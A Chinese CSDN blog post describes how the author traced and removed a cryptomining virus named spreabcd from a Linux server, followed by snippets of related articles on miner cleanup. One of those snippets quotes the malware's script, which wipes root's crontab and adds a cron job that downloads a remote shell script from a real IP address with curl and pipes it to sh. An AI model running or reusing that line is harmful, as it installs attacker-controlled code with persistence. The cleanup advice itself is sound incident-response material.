服务器中了名为spreabcd的挖矿病毒,处理流程。

最新推荐文章于 2024-08-07 09:17:56 发布
最新推荐文章于 2024-08-07 09:17:56 发布
阅读量311 收藏
点赞数
分类专栏: linux shell 文章标签: 反病毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35031494/article/details/121467821
版权

挖矿病毒 服务器安全 进程排查 文件删除 系统维护
关键词由CSDN通过智能技术生成

今天早上在服务器输入命令的时候,突然发现很卡。
于是看了一下内存,发现竟然被全部占用,然后又看了一下cpu,竟然飙到了200%!怀疑中了挖矿病毒。
在这里插入图片描述
于是开始排查:
第一步:ps -aux|grep spreabcd查看与spreabcd相关的进程有几个,分别查看他们的PID、PPID。
在这里插入图片描述
输入:pkill 12707 。杀死和spreabcd有关的所有进程。
然后过了20s发现spreabcd服务又起来了。说明还有脚本再控制着。

第二步:查看进程相关信息:systemctl status 24705
在这里插入图片描述
可以看到与这几个文件相关。
第三步:尝试分别删除这里个文件watchdog.sh,/tmp/11,/tmp/spreabcd。
友情提示:删除前别忘记备份!!
然后在杀掉所有与spreabcd相关的进程。
病毒消失,也不会再出现,OK!!!
其他方法:
也可以通过输入ps -ef|grep spreabcd,然后查看spreabcd进程的ppid来确定是11文件在控制spreabcd的定时启动。
友情提示:别忘了检查crontab定时任务和开机启动项rc.local、rc.d下等文件。
因为我的/etc/rc.local文件中还被写入了系统启动就自启动11文件!
在这里插入图片描述

爱吃西瓜的大松鼠
关注
专栏目录
服务器挖矿病毒的检测及删除方法
penriver的博客
12-13 8500
本文提供了服务器挖矿病毒的检测及删除方法,供有需要的IT人员使用。 最近一段时间,公司内网的linux服务器无故CPU占用很高,导致系统缓慢,严重影响研发部的正常工作。 经排查是部分linux服务器挖矿病毒,该病毒占满cpu进行挖矿,导致系统缓慢。
服务器挖矿病毒怎么解决
m0_70754056的博客
07-14 1815
挖矿病毒是指通过利用计算机的计算资源进行加密货币挖掘的恶意软件。它能够隐藏在云服务器,从而利用服务器的计算资源来进行挖矿。这样的病毒不仅会损害您的服务器,而且还会缩短其使用寿命和性能。今天,我们将向您介绍如何彻底清除云服务器上的挖矿病毒
挖矿病毒应急处置
2301_77977773的博客
07-22 1707
windows server2016虚拟机(切记千万不要再物理机上运行挖矿病毒2024 年 7 月 22 日, 接到XX 局用户电话反馈局域网内有一些终端设备在运行一段时间后出现莫名卡顿,怀疑内网感染了挖矿病毒。客户要求查出来原因,确认出影响范围,删除相关病毒文件并找出如如何感染的,梳理出时间链。从而避免下次出现相同的问题。
服务器挖矿病毒的检测及删除方法(如dhpcd,kdevtmpfs等)
阿拉修
01-10 1万+
最近一段时间,公司内网的linux服务器无故CPU占用很高,导致系统缓慢,严重影响研发部的正常工作。 经排查是部分linux服务器挖矿病毒,该病毒占满cpu进行挖矿,导致系统缓慢。 现将清除挖矿病毒的步骤梳理如下: 1. 检测服务器是否有挖矿病毒 使用top命令查看进程及占用cpu百分比, 如果该进程名称为随机字符串,且cpu占用非常高,则可能感染了挖矿病毒,见如下截图。 2. kill 病毒进程id kill掉CGroup的所有进程id systemctl status 病毒进程id 3. kil
服务器遭遇挖矿病毒syst3md及其伪装者rcu-sched:原因、症状与解决方案
weixin_44874487的博客
03-15 2519
挖矿病毒syst3md及其伪装者的解决方案,涉及到操作系统的完全解决方案!
挖矿病毒处理
hg00_11的博客
06-16 770
https://www.cnblogs.com/heian99/p/12865374.html
【实战】记录一次服务器挖矿病毒处理
weixin_45694388的博客
07-25 1598
信息收集及kill: 查看监控显示长期CPU利用率超高,怀疑病毒 top 命令查看进程资源占用: netstat -lntupa 命令查看有无ip进行发包 netstat -antp 然而并没有找到对应的进程名 查看java进程和solr进程 ps aux :查看所有进程 除相关进程:kill -9(无条件退出进程) 为了防止有定时任务,再次启动恶意进程 crontab -l 命令查看正在进行的定时任务 crontab -r 删除所有定时任务 居然没有???? 保存样本,删除
centos6.8服务器挖矿程序病毒的解决方法
emtit2008的专栏
09-04 931
阿里云提示我的centos服务器出现紧急安全事件:挖矿程序;同时也出现服务器异常登录事件。 出现这样的情况,需要根据以下的步骤去处理 第一步:修改登录的帐号密码,输入命令passwd,根据提未修改。 第二步:禁用可疑的IP,阿里云会有一些IP提示,先把异常登录的IP禁用;命令如下 iptables -I INPUT -s 68.183.140.39 -j DROP //禁用指定的IP ...
病毒】【CPU使用率为100%】Linux 被 kdevtmpfsi 挖矿病毒入侵
走在搬砖的路上!
11-17 1171
重新安装redis(千万不要赋予root权限)服务,根据客户实际需要对特定IP开放端口(利用防火墙设置,尤其是必须对外(公网)提供服务的情况下),如果只是本机使用,绑定127.0.0.1:6379 ,增加认证口令。最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%,第一次删除干净了kdevtmpfsi程序,没曾想几分钟以后,就出现了第二个警告。crontab -r 表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除。
记一次清理挖矿病毒
lixiao0320的专栏
05-13 964
一、前言 这是我第二次遇到这种病毒,第一次是两年前,当时因为公司的一台服务器映射到外网访问,而且还是弱口令,导致整个公司的服务器,全染上了????。。。当时经验缺乏,第一次遇到这种病毒,手足无措,在没有办法的情况下,重新装了一台服务器,后来发现还有好多台,重装效率太低,然后自掏腰包????????(当时主要怕老板骂)找了个运维帮搞定了,然后涨了点知识。。。 这次是之前的同事在他现在公司遇到的问题,搞了好多天无果,找我帮忙看看,由于最近也比较忙,耽误了几天(2021-5-11)才帮他解决(
忆享科技戟星安全实验室|五分钟学会挖矿病毒的应急响应
m0_61431042的博客
06-17 971
随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一。病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高。下面介绍一下linux系统和window系统对挖矿木马的应急响应流程。 ...
挖矿病毒处理
qq_29415357的博客
05-30 411
挖矿病毒处理命令 查看动态任务状况 top 查看病毒进程 ps -ef |grep kdevtmpfsi ps -ef |grep kinsing 查看异常ip和端口 netstat -natp |grep 查找异常文件 find / -name kdevtmpfsi find / -name kinsing 看看有哪些异常的docker镜像 /var/lib/docker/overlay2/3d08459e1c8ed846432961e87ab0e6f82e17749342696997
挖矿病毒常见处置方法
weixin_46597076的博客
02-24 4846
挖矿病毒特征:“挖矿病毒是一段恶意代码或者一个软件,一般利用主机或者操作系统的高危漏洞术在局域网内传播,控制电脑进行大量的计算机运算来获取虚拟货币。该病毒会消耗大量的计算机处理资源,常见的就是系统毒后系统CPU占用接近100%、系统卡顿执行基本命令响应缓慢、系统出现异常进程无法正常kill、系统内存异常占用不稳定等。常见攻击方式:不明邮件附件、文件、连接和网页、不明U盘随意接入、非官方软件和服务器弱口令、高危端口暴露等事件大概处置流程:详细流程、操作命令。
《网络安全自学教程》- 挖矿病毒排查思路和处置步骤
wangyuxiang946的博客
05-05 2万+
首先根据CPU占用率确定确定挖矿进程,找到母体文件并清除。 而后是检查计划任务、启动项挖矿木马的持久化操作,杜绝复发。 最后通过账号、日志、母体文件等信息,溯源攻击路径。
挖矿病毒
weixin_34367257的博客
10-28 2111
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root echo "...
Linux服务器挖矿病毒彻底清除与防护实操指南
最新发布
boydoy1987的专栏
08-07 633
Linux服务器在遭受挖矿病毒攻击时,会严重影响其性能和数据安全。本文将提供一套详细的操作步骤,结合实际案例,帮助您彻底清除Linux服务器上的挖矿病毒,并实施有效的防护措施。
linuxsys挖矿病毒处理
qq_24442273的博客
03-28 1018
一、找出病毒 当发现服务器卡的时候,我们可以采用top命令,如下显示 image.png 我们注意看以上这几个进程,没稍加注意的话,我们还以为这几个是正常的进程,为啥呢? 1、毕竟这几个的user是apache、www、nobody,因为我的web站点,文件目录是www目录,所以这个地方很容易被误认为就是我们的站点目录,而且apache本来是web服务,它取成了这个名词,也容易混淆我们的视野。 2、后面的command名称取成了networkservice 和sysupdate,名称很像我们的系统进程, 3
常见挖矿病毒处理方法(qW3xT/Ddgs.3011/S01wipefs/acpidtd/MSFC)
热门推荐
story-xu的博客
08-09 3万+
常见挖矿病毒处理方法 1、常见病毒 病毒名称:qW3xT: 现象:占用超高CPU,进程查杀之后自启动。 毒案例:(……) 2、病毒名称:Ddgs.3011 现象:占用超高CPU,进程查杀之后自启动。 毒案例:(……) 3、病毒名称:S01wipefs 现象:占用超高CPU,无定时任务,但是病毒源文件存放在较多位置,比较难清除干净。 毒案例:(……) 4、病毒名称:acpidtd 现象:占用超...
【转】服务器挖矿病毒的排查过程
05-25
服务器挖矿病毒会在服务器上运行挖矿程序,因此会在进程列表留下痕迹。通过运行ps命令,可以查看当前的进程列表,如果发现有可疑的进程,则很可能是服务器挖矿病毒导致的。 4. 检查系统日志 服务器挖矿病毒会在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值